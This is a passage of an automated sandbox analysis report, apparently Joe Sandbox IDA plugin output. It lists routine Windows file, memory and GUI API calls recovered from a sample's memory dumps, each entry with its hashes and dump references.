                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$Handle
                                                            • String ID:
                                                            • API String ID: 4209713984-0
                                                            • Opcode ID: d2b83aa9b0bb4d4e0f00bd3486bdaa297e4263733cf250857c78674283f31343
                                                            • Instruction ID: d743bec9cc974df107a8f69fba481bb1225a8854daacf7deb783b32337509fec
                                                            • Opcode Fuzzy Hash: d2b83aa9b0bb4d4e0f00bd3486bdaa297e4263733cf250857c78674283f31343
                                                            • Instruction Fuzzy Hash: 0631E4B1604305AFEB14CF24D908B6E77A5FB81715F04052CF98567290CBB8DD48CBAA
                                                            APIs
                                                              • Part of subcall function 0004D66B: _wcslen.LIBCMT ref: 0004D671
                                                            • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B549
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B57C
                                                            • GetLastError.KERNEL32(?,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B599
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$ErrorLast_wcslen
                                                            • String ID:
                                                            • API String ID: 2260680371-0
                                                            • Opcode ID: 4e0422d9ef0e627e7dde39d011f253cec12336b00d9fa14d5a5bcdceec511cae
                                                            • Instruction ID: 322ccf12d48bc8e793df1266a44dc921de695508dcc066332ad723fe93fe7501
                                                            • Opcode Fuzzy Hash: 4e0422d9ef0e627e7dde39d011f253cec12336b00d9fa14d5a5bcdceec511cae
                                                            • Instruction Fuzzy Hash: BD01FCF1504714A6EF616B745C45FFEB3DCAF09781F044434F906E6092DB68DA81C6B9
                                                            APIs
                                                            • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0006C8C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: 0208dca658d44c5c1ee331c254b95e76fc71931b9bf07915cdcccabdb356c4a7
                                                            • Instruction ID: 2dda6b899bc0949177531b46eb83f618a4cc95a744517497fa57ecc08206fe69
                                                            • Opcode Fuzzy Hash: 0208dca658d44c5c1ee331c254b95e76fc71931b9bf07915cdcccabdb356c4a7
                                                            • Instruction Fuzzy Hash: E041FA7050424C9EEB218E648C88EFABBEAEB55308F1404EDE5DAC7142D235AE45DF30
                                                            APIs
                                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0006BFED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: String
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 2568140703-3893581201
                                                            • Opcode ID: ba5dd38a1aaba76b029085f606278db6ba1c6aa237a171e99e4c30089f050069
                                                            • Instruction ID: 78de18a13c4c2205d4f54b39ee1d7a2f522af049fd5eb634c0a4f57bbfd1076e
                                                            • Opcode Fuzzy Hash: ba5dd38a1aaba76b029085f606278db6ba1c6aa237a171e99e4c30089f050069
                                                            • Instruction Fuzzy Hash: 2E01E532A41209BBEF129F90DC05DEE7FA6EF08760F018515FE0865161CB7A89B1AB95
                                                            APIs
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0006B57F), ref: 0006BF65
                                                            Strings
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpin
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 2593887523-3084827643
                                                            • Opcode ID: 7cdcd4789c31a24ff785fbb47c4de4feffd236a837a195608eccfdd2cadca280
                                                            • Instruction ID: c9d8a254c82f41eb6b7899d4ed83c1107d56ff7b04eedd3a75d66fd13ae11ce2
                                                            • Opcode Fuzzy Hash: 7cdcd4789c31a24ff785fbb47c4de4feffd236a837a195608eccfdd2cadca280
                                                            • Instruction Fuzzy Hash: 72F0B431E81118BBEB119F50DC05C9E7FA2EF24760B408065FD096A271CF7549519B85
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Alloc
                                                            • String ID: FlsAlloc
                                                            • API String ID: 2773662609-671089009
                                                            • Opcode ID: e85ed446fc4f6d12aaba1f9fdd0dded4fd1f4341f8513f989fe7fc27c58cf7b7
                                                            • Instruction ID: 2336c2f6057ba291003182a935bbc9113f830a8f84241c986123f18e8da66076
                                                            • Opcode Fuzzy Hash: e85ed446fc4f6d12aaba1f9fdd0dded4fd1f4341f8513f989fe7fc27c58cf7b7
                                                            • Instruction Fuzzy Hash: 14E05530F812187BE3006B209C069BEBBA5CB14720B458016FA09AB240CF791E8187DE
                                                            APIs
                                                              • Part of subcall function 0006C7CB: GetOEMCP.KERNEL32(00000000,?,?,0006CA54,?), ref: 0006C7F6
                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0006CA99,?,00000000), ref: 0006CC74
                                                            • GetCPInfo.KERNEL32(00000000,0006CA99,?,?,?,0006CA99,?,00000000), ref: 0006CC87
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: cf184ceca8f446bb543210f89a0223e84b7d0a08810e7bc29f95b053f063e9f2
                                                            • Instruction ID: 1a384f04f78f4b99ac061af57447114f634749fa3986ad3305baa4946c463fed
                                                            • Opcode Fuzzy Hash: cf184ceca8f446bb543210f89a0223e84b7d0a08810e7bc29f95b053f063e9f2
                                                            • Instruction Fuzzy Hash: 8F511170A002459EFB209F75C885EFABFE6AF85310F14447EE0DA8B252D7399946CB90
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,0004AC90,?,?,00000000,?,?,00049C6D,?), ref: 0004AE1A
                                                            • GetLastError.KERNEL32(?,?,00049C6D,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 0004AE29
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 6f46d6e246aaf18de8b4b2f9d7144fa01d2e0c97c6f5390e3279e7396ace5f75
                                                            • Instruction ID: 4e8d8a63dfabf0859c7c05de8c42aa87dc4fcbcbe1bcbe476515d338a8101bdd
                                                            • Opcode Fuzzy Hash: 6f46d6e246aaf18de8b4b2f9d7144fa01d2e0c97c6f5390e3279e7396ace5f75
                                                            • Instruction Fuzzy Hash: 6F4124F4B843458BDB349E24C488AAE73E5FB4A322F100539E95787A51D7B4DC818B9B
                                                            APIs
                                                              • Part of subcall function 0006A365: GetLastError.KERNEL32(?,000830C4,000657D2,000830C4,?,?,0006524D,?,?,000830C4), ref: 0006A369
                                                              • Part of subcall function 0006A365: _free.LIBCMT ref: 0006A39C
                                                              • Part of subcall function 0006A365: SetLastError.KERNEL32(00000000,?,000830C4), ref: 0006A3DD
                                                              • Part of subcall function 0006A365: _abort.LIBCMT ref: 0006A3E3
                                                              • Part of subcall function 0006CB5E: _abort.LIBCMT ref: 0006CB90
                                                              • Part of subcall function 0006CB5E: _free.LIBCMT ref: 0006CBC4
                                                              • Part of subcall function 0006C7CB: GetOEMCP.KERNEL32(00000000,?,?,0006CA54,?), ref: 0006C7F6
                                                            • _free.LIBCMT ref: 0006CAAF
                                                            • _free.LIBCMT ref: 0006CAE5
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            • Opcode ID: 79a8effec5aa7dfd3409f5f450d0c5cd66696f89cc2d7d3532d407ab6092d89a
                                                            • Instruction ID: cb2999b5443867c5a711c63646ca837758c2f02ef816ab77033bbf215909392a
                                                            • Opcode Fuzzy Hash: 79a8effec5aa7dfd3409f5f450d0c5cd66696f89cc2d7d3532d407ab6092d89a
                                                            • Instruction Fuzzy Hash: 4931E231904208AFEB10EFE8D840FBE77E7EF41324F254099E8449B292EB369D41DB91
                                                            APIs
                                                            • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00047EB0,?,?,?,00000000), ref: 0004B02C
                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 0004B0E0
                                                            Similarity
                                                            • API ID: File$BuffersFlushTime
                                                            • String ID:
                                                            • API String ID: 1392018926-0
                                                            • Opcode ID: 774157747b4dc2a7fcde93b26b48f8bd96f7811a1ce6601a2492ca0c858f2b71
                                                            • Instruction ID: 7855c3c7defa46e8f66789b2433833ca5018487a9138f788422b5a58662a7e7e
                                                            • Opcode Fuzzy Hash: 774157747b4dc2a7fcde93b26b48f8bd96f7811a1ce6601a2492ca0c858f2b71
                                                            • Instruction Fuzzy Hash: 0221E171248242EFC714DE64C891AABBBE4AF55306F04492DB8E583152D729E90CD766
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0004B197,?,?,000481DD), ref: 0004A926
                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0004B197,?,?,000481DD), ref: 0004A956
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 4578682801949b6d4d96eb76d906774152199d035e9a50d31896a41d09665ac9
                                                            • Instruction ID: 784191f44b7bbfc0127366ebabac410011bc46bf9bd711c3d5076e5a23268c13
                                                            • Opcode Fuzzy Hash: 4578682801949b6d4d96eb76d906774152199d035e9a50d31896a41d09665ac9
                                                            • Instruction Fuzzy Hash: AB21D6B16443446EE3B08A65CC89FF776DCEB4A321F014A29F9D6C21D2C778AC849776
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00041F35
                                                              • Part of subcall function 000442DA: __EH_prolog.LIBCMT ref: 000442DF
                                                            • _wcslen.LIBCMT ref: 00041FDA
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            • Opcode ID: b299be28bfcdddca3a24ac8c6c76c19e32cd7e110356e6a3c79e51a30b14f12b
                                                            • Instruction ID: 357c8c013420875172955a954d61164232200462affa51ade91e65b3ec7cebbd
                                                            • Opcode Fuzzy Hash: b299be28bfcdddca3a24ac8c6c76c19e32cd7e110356e6a3c79e51a30b14f12b
                                                            • Instruction Fuzzy Hash: 39216BB1904218AFCF11AF98D8559EEFBB6BF08300F00043DE446A7262C7755995CB68
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,00000001,000A40C4,?,?,?,00064D46,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx,00000000,?,00064AFD,000A40C4,00000FA0), ref: 00064BD5
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00064BDF
                                                            Similarity
                                                            • API ID: AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3013587201-0
                                                            • Opcode ID: bd17c5732fe983631bfe7181ed23e3c61f604fc551f5bd5ad4a0649365f99655
                                                            • Instruction ID: 4fedfab74ccb12a020d349cd713362c9a7b16b30808970be0e6929d760a4bd12
                                                            • Opcode Fuzzy Hash: bd17c5732fe983631bfe7181ed23e3c61f604fc551f5bd5ad4a0649365f99655
                                                            • Instruction Fuzzy Hash: D6117C35A04115DF9F22CFA8ECC0AAE73E6FF4635072412A9EA05A7210E774ED41CBD0
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0004B137
                                                            • GetLastError.KERNEL32 ref: 0004B144
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 0523078c299fab0ceaeb2ece1a3dd177ebdd85b2a5ccb0e9ad46176f2bd97628
                                                            • Instruction ID: 0483f61acccab46dc7d1d638d6ee3d46102130de2c5b8257d72a8c125f13a3d8
                                                            • Opcode Fuzzy Hash: 0523078c299fab0ceaeb2ece1a3dd177ebdd85b2a5ccb0e9ad46176f2bd97628
                                                            • Instruction Fuzzy Hash: 971108B1A00200EBEB349628CC51BA7B3E9BB45370FA00B79E152D35E0D774ED45C754
                                                            APIs
                                                            • _free.LIBCMT ref: 0006A515
                                                              • Part of subcall function 0006A64E: RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            • HeapReAlloc.KERNEL32(00000000,?,?,?,?,000830C4,0004187A,?,?,00000007,?,?,?,000413F2,?,00000000), ref: 0006A551
                                                            Similarity
                                                            • API ID: Heap$AllocAllocate_free
                                                            • String ID:
                                                            • API String ID: 2447670028-0
                                                            • Opcode ID: bb5443786fff4be423bfeb92490b2cffff0f71f497164962a0903c5dac2c77f9
                                                            • Instruction ID: 895f5a00e0155c8c0cfadd427360dbab2312d432240ebffa8ca651ba5fb7e501
                                                            • Opcode Fuzzy Hash: bb5443786fff4be423bfeb92490b2cffff0f71f497164962a0903c5dac2c77f9
                                                            • Instruction Fuzzy Hash: 76F0AF2230191066DB21BA26AC01BAF279BDFC3B70B154116F807B6192EA249E018D63
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 000523A3
                                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 000523AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: 4b9281331909d90407c0457becb89eb3320febc85ddf31955bc6a4ec81fad327
                                                            • Instruction ID: 5051ac67b46b6d124152d8adad88f10638bcd1263f0f893d03de5c8b455c05c6
                                                            • Opcode Fuzzy Hash: 4b9281331909d90407c0457becb89eb3320febc85ddf31955bc6a4ec81fad327
                                                            • Instruction Fuzzy Hash: 2BE09A32F0010AA7DF098BA49C099EB76ECEF552463248179A903F3100EA7CDE4946A0
                                                            APIs
                                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B8DA
                                                              • Part of subcall function 0004CF12: _wcslen.LIBCMT ref: 0004CF36
                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B90B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: e3f1084ca5132c5e1e32ad41c551aa558adec2c2afb10362fc9c39f328725dc5
                                                            • Instruction ID: c125f5aec77946880916beb81affa90a3f37515f0ecaa64497a937fe61023c64
                                                            • Opcode Fuzzy Hash: e3f1084ca5132c5e1e32ad41c551aa558adec2c2afb10362fc9c39f328725dc5
                                                            • Instruction Fuzzy Hash: 5AF0A03150010AABEF015FA0CC01FDA37ADBB043C5F048060BA44D6161DB35CEA4AA60
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,00000000,?,0004A416,?,?,?,?,0004890B,?,?,?,0007365F,000000FF), ref: 0004B461
                                                              • Part of subcall function 0004CF12: _wcslen.LIBCMT ref: 0004CF36
                                                            • DeleteFileW.KERNEL32(?,?,?,00000800,?,0004A416,?,?,?,?,0004890B,?,?,?,0007365F,000000FF), ref: 0004B48F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DeleteFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2643169976-0
                                                            • Opcode ID: c212d09911d7032b8a373da6c0f0d00d3e24ea6eabe86c4f3430e9eb7274e223
                                                            • Instruction ID: 3344d62a44ce5daf289281c2107f88530134748f9ee8594187a745d67673a055
                                                            • Opcode Fuzzy Hash: c212d09911d7032b8a373da6c0f0d00d3e24ea6eabe86c4f3430e9eb7274e223
                                                            • Instruction Fuzzy Hash: 3EE092B65402096BEB019BA0CC45FEA379CBB083C2F484031B949D60A2EB78DDD99A54
                                                            APIs
                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,0007365F,000000FF), ref: 0005BD85
                                                            • OleUninitialize.OLE32(?,?,?,?,0007365F,000000FF), ref: 0005BD8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: GdiplusShutdownUninitialize
                                                            • String ID:
                                                            • API String ID: 3856339756-0
                                                            • Opcode ID: ffd8b212752e7eb746e9094c546042f63db36b0bd976b8594bca7c323086bc92
                                                            • Instruction ID: 0ce21de89c260115aebb5b404d0becfd359971c0bcdf461a16f782db8fe775ba
                                                            • Opcode Fuzzy Hash: ffd8b212752e7eb746e9094c546042f63db36b0bd976b8594bca7c323086bc92
                                                            • Instruction Fuzzy Hash: 87E06572604A50EFE7019B5CDC05B59FBA8FB89B20F044326B51593761CB7C6841CA94
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,0004B4AA,?,00048022,?), ref: 0004B4C4
                                                              • Part of subcall function 0004CF12: _wcslen.LIBCMT ref: 0004CF36
                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,0004B4AA,?,00048022,?), ref: 0004B4F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$_wcslen
                                                            • String ID:
                                                            • API String ID: 2673547680-0
                                                            • Opcode ID: fc431af5e10faebbccb4da55e177db8332d94ef5c4330eab6bac50575deac4e8
                                                            • Instruction ID: 46bccd841cecefc4588b4316782c2e13259a7665e66a7f1db47811e06d976a90
                                                            • Opcode Fuzzy Hash: fc431af5e10faebbccb4da55e177db8332d94ef5c4330eab6bac50575deac4e8
                                                            • Instruction Fuzzy Hash: 58E0617150021897DB10A764DC04BE9379CFB483E1F000170FE55E71D1D738CD8086D0
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0005EEAC
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • SetDlgItemTextW.USER32(00000065,?), ref: 0005EEC3
                                                              • Part of subcall function 0005C5F8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C609
                                                              • Part of subcall function 0005C5F8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C61A
                                                              • Part of subcall function 0005C5F8: IsDialogMessageW.USER32(0001046C,?), ref: 0005C62E
                                                              • Part of subcall function 0005C5F8: TranslateMessage.USER32(?), ref: 0005C63C
                                                              • Part of subcall function 0005C5F8: DispatchMessageW.USER32(?), ref: 0005C646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                            • String ID:
                                                            • API String ID: 2718869927-0
                                                            • Opcode ID: 7f561f14216d45ee279a876cb3e708e2690291838e0327264be4e835a76004b6
                                                            • Instruction ID: 45290eff646dec839c927f18539c312a328d580265a2ccadaeb8b92ac7742875
                                                            • Opcode Fuzzy Hash: 7f561f14216d45ee279a876cb3e708e2690291838e0327264be4e835a76004b6
                                                            • Instruction Fuzzy Hash: FCE0D1F550434926FF016761EC0AFFF366C6B0638AF040071B641970B3D67CDA548B66
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B2F
                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00050613,Crypt32.dll,00000000,0005068D,00000200,?,00050670,00000000,00000000,?), ref: 00051B51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 75482fd34c958742159fff0b386dfac3e408c0846f5aa2d7020666718152a0c5
                                                            • Instruction ID: 68715f99e48374c50144ba73876de4f75064fbee3d5784e7dc5d17c659c5de70
                                                            • Opcode Fuzzy Hash: 75482fd34c958742159fff0b386dfac3e408c0846f5aa2d7020666718152a0c5
                                                            • Instruction Fuzzy Hash: 62E048769002186ADB11A794DC45FDB77ACEF0D3C2F044065BA49E3055E778DA84CBF0
                                                            APIs
                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005B3B9
                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0005B3C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
